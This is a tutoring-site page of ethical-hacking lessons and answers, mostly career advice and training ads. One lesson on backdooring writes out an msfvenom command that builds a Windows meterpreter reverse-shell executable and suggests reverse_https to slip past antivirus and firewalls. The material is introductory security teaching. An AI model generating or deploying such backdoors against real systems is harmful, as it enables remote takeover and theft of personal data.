Find the best tutors and institutes for IT Security Management

Find IT Security Management Tutors & Institutes

Please select a Category.

Please select a Locality.

No matching category found.

No matching Locality found.

Outside India?

Search for topics

Feed

Ask a Question

Post a Lesson

All

All

Lessons

Discussion

Lesson Posted on 04 Jun IT Courses/IT Security Management /Ethical Hacking & Cyber Security IT Courses/Application Security

Prerequisites To Get Started Into Ethical Hacking

Grandhi Srikanth

Cyber security is the field I love the most. I have Certified Ethical Hacker(C|EH) from EC-Council Cisco...

Getting into ethical hacking as a beginner, one has confusion about where to start. There are many resources but the only question remains in mind for a beginner is "What is the zero level to start?". But, here are some tips for you if you want to get started. Get knowledge on, Networking: OSI,... read more

Getting into ethical hacking as a beginner, one has confusion about where to start. There are many resources but the only question remains in mind for a beginner is "What is the zero level to start?". But, here are some tips for you if you want to get started.

Get knowledge on,

Networking:

  • OSI, TCP/IP models
  • TCP/UDP Differences and Flags
  • Three-way handshake(SYN, SYN&ACK, ACK)
  • Ports and IP, how it works
  • Mostly used port numbers
  • Public and Private addresses
  • Definitions of DHCP, ARP and how they work
  • Subnetting(Just introduction is excellent)

Cryptography:

  • Descriptions of Symmetric and Asymmetric encryptions
  • What is Public key and Private key
  • Hash and Encryption difference
  • HTTPS and why to use SSL/TLS

Programming:

  • "Eeew not C" go for basics of python. Programming is not compulsory, But always preferable.

Other:

  • Get familiar with basic Linux commands.
  • Using Putty or SSH
  • How Server/Client works in networking model.
  • How HTTP protocol works

Again, it is always prefered to know these domains, no need to be an expert. Always remember, Practice while you learn. Learn while you practice.

read less
Comments
Dislike Bookmark

Lesson Posted on 04 Jun IT Courses/Malware Analysis IT Courses/ECSA EC-Council Certified Security Analyst IT Courses/Penetration Testing +1 IT Courses/IT Security Management /Ethical Hacking & Cyber Security less

An Introduction to Backdooring

Grandhi Srikanth

Cyber security is the field I love the most. I have Certified Ethical Hacker(C|EH) from EC-Council Cisco...

In the hacking world, backdooring is the way to control a computer remotely. An attacker would trick to install a piece of software which has a backdoor in it on the victim and as soon as he installs it, an attacker can gain access to the computer and personal data. A backdoor would communicate using... read more

In the hacking world, backdooring is the way to control a computer remotely. An attacker would trick to install a piece of software which has a backdoor in it on the victim and as soon as he installs it, an attacker can gain access to the computer and personal data. A backdoor would communicate using the attackers IP and listens to commands from the attacker and execute them.

  • VICTIM ( Listen to Incoming connections)
  • VICTIM
  • VICTIM(Executes COMMAND) --------SEND OUTPUT--------> ATTACKER

Generally, for learning the purpose, we can create a windows backdoor using msfvenom tool.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP_Address LPORT=$port_number -f exe > malware.exe

Using the above command on Kali Linux, we can generate windows backdoor,-p is for payload, and we choose reverse_tcp LHOST is for the attacker IP address, LPORT is for the port attacker want to listen. Antivirus can detect these backdoors.

For evasion, there are many technics an attacker can use. Using reverse_https, reverse_dns etc. instead of reverse_tcp. Using reverse_https makes antivirus the traffic(Packets) is HTTPS port:443 related traffic and won't make a notice. Even if antivirus or a firewall inspect the traffic, the packets are encrypted, and so, the backdoor will be undetectable.

There are many ways these can be detected, and this proves how careful one should be while using the internet.

read less
Comments
Dislike Bookmark

Answered on 28 May IT Courses/IT Security Management /Ethical Hacking & Cyber Security

WiTTyMinds

Training Centre

Rather Than qualification, I would say skills. Even a 10th Class pass person can be a good ethical hacker.Only the companies which are hiring based on degree certificates would be a challenge otherwise to become an expert just below skills are required:-1) Strong knowledge of Operating System and Commands... read more

Rather Than qualification, I would say skills.
Even a 10th Class pass person can be a good ethical hacker.
Only the companies which are hiring based on degree certificates would be a challenge otherwise to become an expert just below skills are required:-

1) Strong knowledge of Operating System and Commands ( Windows and Linux both including File System and Kernel, dlls etc.)
2) Networking (including router topology and protocols)
3) Network Protocols.
4) Problem Solving Skills
5) Visualization of power.
6) Algorithmic Design & Programming/Scripting languages knowledge.
7) Database knowledge.
8) Cross Platform(Windows, Mac, Linux)  knowledge and execution of tools.
9) Quickly able to understand/ adapt new languages or software tools.
10) Strong Puzzle-Solving Skills.
Etc Etc
Hope this information will help you.
All the Best.
Regards,
wiTTYMinds

read less
Answers 7 Comments
Dislike Bookmark

Looking for IT Security Management Training

Find best IT Security Management Training in your locality on UrbanPro.

FIND NOW

Answered on 11 Jun IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Triad Square Infosec

Training, Consulting and staffing services in the information security domain.

Hi Mohammed , if you are looking for any Cyber security training I can help you with your training done along with the certification which can be completed in 40 hours and it has 19 modules not only you will study from basic to advance but also our instructor will teach you complete practicals. we provide... read more

Hi Mohammed , if you are looking for any Cyber security training I can help you with your training done along with the certification which can be completed in 40 hours and it has 19 modules not only you will study from basic to advance but also our instructor will teach you complete practicals. we provide passing assurance as all our trainers are highly qualified having more than 10-15yrs of work experience in the same. Feel free to reach me on Seven Six two five zereo nine six nine three five / Eight two nine six six two one one four nine. Please visit our website www.triadsquare.com for more information 

 
Email me to sheerin.a at triadsquare.com 

 

read less
Answers 3 Comments
Dislike Bookmark

Lesson Posted on 14 May IT Courses/IT Security Management /Ethical Hacking & Cyber Security

A Torch for the Green Hats.

Varun

I have been working in the cyber domain for more than 4 years now, partly as freelance trainer and partly...

How do I become a hacker? I have received this question countless times on formal and informal occasions. I feel the need to put a small sum up on the rules for you. Step 1. Ask yourself the Why. Do I want to be a hacker, or do I want to be "called" a hacker? Understand the difference, having a nerd... read more

How do I become a hacker?


I have received this question countless times on formal and informal occasions. I feel the need to put a small sum up on the rules for you.

Step 1. Ask yourself the Why.

Do I want to be a hacker, or do I want to be "called" a hacker?

Understand the difference, having a nerd trick up your sleeve is excellent to level-up among your friends, but that motivation is not enough, because there will be ups and downs, there will be failures, and there will be monotonous days when for hours you might have to see gibberish data. If you are inspired by the Matrix green code, or by that neighbour in a black hoodie in his bean bag with terminals on laptop jampacked with green text, stop right here. Ask and search your ground-zero motivation.

 

Step 2. Don't say NO to anything.

I love the Metasploit, but I won't deal with the ruby code, I hate the programming stuff.

Really? I don't think you will ever rise from a script kiddie. Never say never, be it SQL, Python, CSS, assembly, or something outrageously alien to you. If you cant bear hundreds and hundreds of lines of code, you are not ready yet. Curiosity never killed the cat, Ignorance did, and Ignorance in cyber world will kill your ambition-cat.

 

Step 3. Patience!

Why the heck am I getting the same compilation error from the past three freaking days!!

Okay, maybe I exaggerated a bit, but this will happen. Things will fall apart, and they won't work and damn! A machine doesn't understand your emotions, well at least not yet. You will have streaks of hours, maybe days, coffee after coffee, stuck with a problem. In those times, have patience. Remember at the root (no pun intended); hacking is a form of Art. And the greatest of artists need off times. Maybe go for a walk, or have a cricket match, you know the drill.

 

Step 4. Focus on what's important.

I am the jack of all trades lol.

Hold on, its nothing to show off about. I would instead wish you be an ace of one and sub-jack of others. You are doing nothing significant if you have got the breadth of network, wireless, system, servers or forensics but the depth of none. Find your specialisation and tear through it. Curiosity will automatically get you the breadth you desire; it's the mind-numbing toil that will take you all the way through the rabbit hole of one.

 

Step 5. Communicate.

Yes, this is it! One of the prime reasons you will enjoy this will be via the communication with your peers, friends or maybe me :)

Talking to a machine day in and out is not an easy deal. Especially if she is not telling you the problem, she is facing. Talk it out! Spring open the queries, doubts and the questions, however silly they are (just not on StackOverflow, the moderators tend to get offended quickly). Communication is one of the original keys of the meaningful human existence. Use it to advantage. Make it worthy!

read less
Comments
Dislike Bookmark

Answered on 20 Jun IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Monica Singh

Trainer

You can become certified ethical hacker by doing first the basic training which no Institute otherthan Institute of Information Security will teach . Training from scratch , practical hand on training with certification and placement too with full fledged cybersecurity training . Approach Institute... read more

You can become certified ethical hacker by doing first the basic training which no Institute otherthan Institute of Information Security will teach .  Training from scratch , practical hand on training with certification and placement too with full fledged cybersecurity training .

Approach Institute of Information Security , Chandigarh    

http://www.iisecurity.in/contact-us.php

read less
Answers 8 Comments
Dislike Bookmark

Looking for IT Security Management Training

Find best IT Security Management Training in your locality on UrbanPro.

FIND NOW

Answered on 21 Jun IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Olalekan Admin

Trainer

Qualification is not necessary for learning ethical hacking but web programming and networking background are quite enough for learning ethical hacking. But if one wants to become a professional in this field the person should have strong practical knowledge on how program and network with Microsoft... read more

Qualification is not necessary for learning ethical hacking but web programming and networking background are quite enough for learning ethical hacking. But if one wants to become a professional in this field the person should have strong practical knowledge on how program and network with Microsoft windows and Linux system and for professional foundation CEH training is required.

 

Regards 

Olalekan Admin.

read less
Answers 5 Comments
Dislike Bookmark

Answered on 02 May IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Bharath Kumar N

Ethical Hacking Trainer

Hi Jitendra, if you want to detailed career path, start with CCNA/ or network+ for Basic Networking , then CEH basic ethical Hacking, once your ok with basics you can go for advanced ethical Hacking Skills like ECSA or OSCP
Answers 3 Comments
Dislike Bookmark

Answered on 02 May IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Bharath Kumar N

Ethical Hacking Trainer

Usually for the Ethical Hacking Jobs, you may be requiring to be graduated with any degree(Preferably Technical ), but for learning Ethical Hacking, you need good Knowledge in Networking and some web language would be an added advantage
Answers 3 Comments
Dislike Bookmark

Looking for IT Security Management Training

Find best IT Security Management Training in your locality on UrbanPro.

FIND NOW

Answered on 13/12/2017 IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Mercury Solutions limited

Ethical Hacking would be a better choice. The demand of CEH Professionals is increasing to protect the Virtual Data from Hackers and spammers. Organizations are in search of great minds. I would suggest you learn Ethical Hacking. READ This Guide: http://bit.ly/2nUlJyL
Answers 4 Comments
Dislike Bookmark

About UrbanPro

UrbanPro.com helps you to connect with the best IT Security Management Training in India. Post Your Requirement today and get connected.

Overview

Questions 483

Lessons 23

Total Shares  

Follow 2,519 Followers

Related Topics

Top Contributors

Connect with Expert Tutors & Institutes for IT Security Management

x

Ask a Question

Please enter your Question

Please select a Tag

UrbanPro.com is India's largest network of most trusted tutors and institutes. Over 25 lakh students rely on UrbanPro.com, to fulfill their learning requirements across 1,000+ categories. Using UrbanPro.com, parents, and students can compare multiple Tutors and Institutes and choose the one that best suits their requirements. More than 6.5 lakh verified Tutors and Institutes are helping millions of students every day and growing their tutoring business on UrbanPro.com. Whether you are looking for a tutor to learn mathematics, a German language trainer to brush up your German language skills or an institute to upgrade your IT skills, we have got the best selection of Tutors and Training Institutes for you. Read more